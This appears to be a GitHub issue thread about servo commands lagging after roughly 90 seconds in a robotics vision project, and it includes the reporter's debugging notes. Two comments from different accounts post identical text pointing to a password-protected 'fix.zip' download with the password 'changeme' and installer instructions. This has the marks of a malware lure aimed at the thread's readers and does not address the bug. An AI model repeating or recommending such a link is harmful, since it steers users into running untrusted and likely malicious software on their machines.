### ISSUE TITLE
Servo movement gets laggy after some time running the program

### ISSUE THREAD

**Issue by PositiveBeat** [energinet-digitalisering/energirobotter-vision#2]
### Description of the bug

After ~90 seconds of runtime, the servo seems to get sent position commands at a much slower interval. 
The servo doesn't get fast after a few lacks, indicating that the position is sent at a lower rate, not the servo itself that's lagging. 

Restarting the launch files solves the problem. 

It could be the serial connection that gets flooded, or the Python program somehow lagging behind.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PositiveBeat** [comment]
When printing from the face_following node, it clearly slows down when the servo starts to lag. It's a pretty sudden change from working smoothly to lagging.

**Comment by PositiveBeat** [comment]
After 1.30 minutes without movement, the bug did not happen, but then I moved the servo and by the 2.20 minute mark it started to happen. 

When no face was detected the timer_callback seemed to completely stop and would start again (still being slow) when the face was detected again. The code never caught up to speed, so it is uncertain if its a buffer issue.
